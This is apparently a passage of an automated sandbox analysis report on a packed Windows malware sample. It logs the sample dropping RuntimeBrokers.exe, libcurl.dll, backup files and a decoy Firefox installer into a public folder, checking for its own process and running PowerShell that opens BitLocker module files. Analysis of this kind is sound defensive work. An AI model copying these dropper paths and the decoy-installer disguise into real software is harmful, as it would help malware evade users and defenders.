Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: Firefox Setup 132.0.2.exe.lnk.4.drLNK file: ..\..\Public\Bilite\Firefox Setup 132.0.2.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: Fqae7BLq4m.exeStatic file information: File size 70322189 > 1048576
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.201220974867.0000000008585000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201220974867.00000000085A1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \YSS\Release\libcurl.pdb source: RuntimeBrokers.exe, 00000004.00000003.201085672635.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, libcurl.dll.0.dr
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.201214927053.000000000710B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb>1 source: powershell.exe, 0000000E.00000002.201222818106.00000000086C6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: G:\ZCSD\XZRecordAlone\xzrecordalone\Release\XZCalendarServer.pdb source: RuntimeBrokers.exe, 00000004.00000000.200383225107.0000000000CFF000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 0000000E.00000002.201222343312.0000000008672000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.201222818106.00000000086C6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.201198714669.00000000009A3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb], source: powershell.exe, 0000000E.00000002.201198714669.00000000009A3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb, source: powershell.exe, 0000000E.00000002.201222343312.0000000008672000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb0 source: powershell.exe, 0000000E.00000002.201214927053.000000000710B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.201198714669.00000000009A3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.201198714669.00000000009A3000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeCode function: 0_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,0_2_00406D5D
Source: libcurl.dll.0.drStatic PE information: section name: .00cfg
Source: backup.dll.4.drStatic PE information: section name: .00cfg
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeCode function: 0_2_00411C20 push eax; ret 0_2_00411C4E
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeFile created: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeJump to dropped file
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile created: C:\Users\user\AppData\Local\Temp\backup.dllJump to dropped file
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeFile created: C:\Users\Public\Bilite\Firefox Setup 132.0.2.exeJump to dropped file
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeFile created: C:\Users\Public\Bilite\Axialis\libcurl.dllJump to dropped file
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile created: C:\Users\user\AppData\Local\Temp\backup.exeJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeKey value created or modified: HKEY_CURRENT_USER\Console\0 9e9e85e05ee16fc372a0c7df6549fbd4Jump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
